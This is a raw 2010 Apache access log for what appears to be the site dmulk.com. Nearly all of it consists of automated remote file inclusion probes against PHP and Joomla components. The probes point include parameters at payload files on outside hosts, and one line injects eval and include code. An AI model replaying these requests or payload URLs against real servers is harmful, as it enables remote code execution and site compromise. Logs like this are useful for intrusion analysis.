212.241.177.123 - - [12/Mar/2010:10:10:26 -0800] "GET /logs/access.log//cal//tools/send_reminders.php?noSet=0&includedir=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:10:26 -0800] "GET /cal//tools/send_reminders.php?noSet=0&includedir=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:10:26 -0800] "GET /logs/access_080327.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:10:26 -0800] "GET /logs/access_090411.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:10:27 -0800] "GET /logs/access_090626.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:10:27 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:10:27 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:10:28 -0800] "GET /logs/access_100122.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:10:29 -0800] "GET /logs/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:10:29 -0800] "GET /logs/access_080717.log%20%20/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:10:30 -0800] "GET /errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:10:41 -0800] "GET /logs/access_090203.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:10:45 -0800] "GET /errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:10:45 -0800] "GET /logs/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:10:45 -0800] "GET /logs/access_080717.log%20%20/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:10:55 -0800] "GET /logs/access_090903.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:11:02 -0800] "GET /logs/access_100122.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:11:06 -0800] "GET /logs/access_080501.log//modules/agendax/addevent.inc.php?agendax_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:11:06 -0800] "GET /logs/access_080619.log//modules/agendax/addevent.inc.php?agendax_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:11:33 -0800] "GET /logs/access_090713.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:11:38 -0800] "GET /logs/access_080519.log%20%20/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:11:38 -0800] "GET /logs/index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:11:39 -0800] "GET /logs/access_090604.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:11:39 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
12.10.157.29 - - [12/Mar/2010:10:11:39 -0800] "GET /index.php?pagina=http://maniacos.net/_vti_text?? HTTP/1.1" 200 14969 "-" "Mozilla/5.0" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:11:39 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:11:46 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:11:46 -0800] "GET /logs/access_090428.log//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:11:46 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:11:49 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:11:49 -0800] "GET /logs/access_080422.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:11:49 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:11:52 -0800] "GET /logs/access_090604.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:11:54 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:11:54 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:11:54 -0800] "GET /logs/access_080327.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:10:12:12 -0800] "GET /logs/access_090516.log//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:12:13 -0800] "GET /logs/access_090428.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:10:12:16 -0800] "GET /bikes/dteel/CreSTOC09/?S=A HTTP/1.0" 200 3481 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:12:16 -0800] "GET /logs/access_090820.log//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:12:18 -0800] "GET /logs/access_090521.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:12:19 -0800] "GET /logs/access_090521.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:12:28 -0800] "GET /logs/access_080501.log//modules/agendax/addevent.inc.php?agendax_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:12:28 -0800] "GET /logs/access_080619.log//modules/agendax/addevent.inc.php?agendax_path=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:12:30 -0800] "GET /logs/access_080929.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:12:31 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:12:31 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:12:31 -0800] "GET /logs/access_090227.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:12:32 -0800] "GET /logs/access_100122.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:12:37 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:12:37 -0800] "GET /logs/access_090408.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:12:37 -0800] "GET /logs/access_100122.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:12:38 -0800] "GET /logs/access_080619.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:12:38 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:12:38 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:12:38 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:10:12:44 -0800] "GET /bikes/?D=D HTTP/1.0" 200 4358 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:12:50 -0800] "GET /logs/access_090405.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:12:52 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:12:52 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:12:52 -0800] "GET /logs/access_080929.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:12:54 -0800] "GET /logs/access_090530.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:13:18 -0800] "GET /logs/access_090713.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:10:13:23 -0800] "GET /logs/access_090504.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:13:26 -0800] "GET /cal//tools/send_reminders.php?noSet=0&includedir=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:13:26 -0800] "GET /logs/access_080128.log//cal//tools/send_reminders.php?noSet=0&includedir=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:13:26 -0800] "GET /logs//cal//tools/send_reminders.php?noSet=0&includedir=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:13:29 -0800] "GET /logs/access_090203.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:13:32 -0800] "GET /logs/access_090408.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:13:32 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:13:33 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:13:46 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:13:46 -0800] "GET /logs/access_080619.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:13:46 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:13:46 -0800] "GET /logs/access_090405.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:13:47 -0800] "GET /logs/access_090713.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:13:56 -0800] "GET /logs/access_090203.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:13:57 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.mangosteenforsale.com/mango/images/demo.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:13:59 -0800] "GET /logs/access_080128.log%20%20//cal//tools/send_reminders.php?noSet=0&includedir=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:13:59 -0800] "GET /logs/access_080405.log%20%20//cal//tools/send_reminders.php?noSet=0&includedir=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:14:02 -0800] "GET /logs/access_080315.log%20%20/mygallerybrowser.php?myPath=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:14:02 -0800] "GET /mygallerybrowser.php?myPath=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:14:02 -0800] "GET /logs/mygallerybrowser.php?myPath=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:10:14:05 -0800] "GET /logs/access_081026.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:10:14:05 -0800] "GET /logs/access_090620.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:14:06 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:14:06 -0800] "GET /logs/access_080501.log//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:14:06 -0800] "GET /logs/access_080619.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:14:06 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:14:06 -0800] "GET /logs/access_080619.log//modules/agendax/addevent.inc.php?agendax_path=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:14:35 -0800] "GET /logs/access_090517.log%20%20/mygallerybrowser.php?myPath=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:14:40 -0800] "GET /logs/access_080501.log//modules/agendax/addevent.inc.php?agendax_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:14:40 -0800] "GET /logs/access_080619.log//modules/agendax/addevent.inc.php?agendax_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:14:51 -0800] "GET /logs/access_080501.log//modules/agendax/addevent.inc.php?agendax_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:10:14:51 -0800] "GET /logs/access_080619.log//modules/agendax/addevent.inc.php?agendax_path=http://www.muzykologia.lublin.pl/templates/system/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:15:22 -0800] "GET /logs/access.log///bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:15:33 -0800] "GET /logs/access_100211.log///bbs//write_comment_update.php?board_skin_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:16:23 -0800] "GET /logs/access_080327.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:10:16:42 -0800] "GET /logs/access_090428.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:16:53 -0800] "GET /logs/access_080110.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:16:53 -0800] "GET /logs/access_080710.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:16:57 -0800] "GET /logs/access_080110.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:17:08 -0800] "GET /logs/access_090408.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:17:13 -0800] "GET /logs/access_080710.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sample3.itprogram.co.kr//upload/product/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:10:17:23 -0800] "GET /logs/access_090405.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.218.116.133 - - [12/Mar/2010:10:18:03 -0800] "GET /bikes/2k6klr650/?N=D HTTP/1.1" 200 1379 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:10:18:10 -0800] "GET /logs/access_090120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:18:24 -0800] "GET /logs/access_090428.log//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:18:35 -0800] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:18:35 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:18:35 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
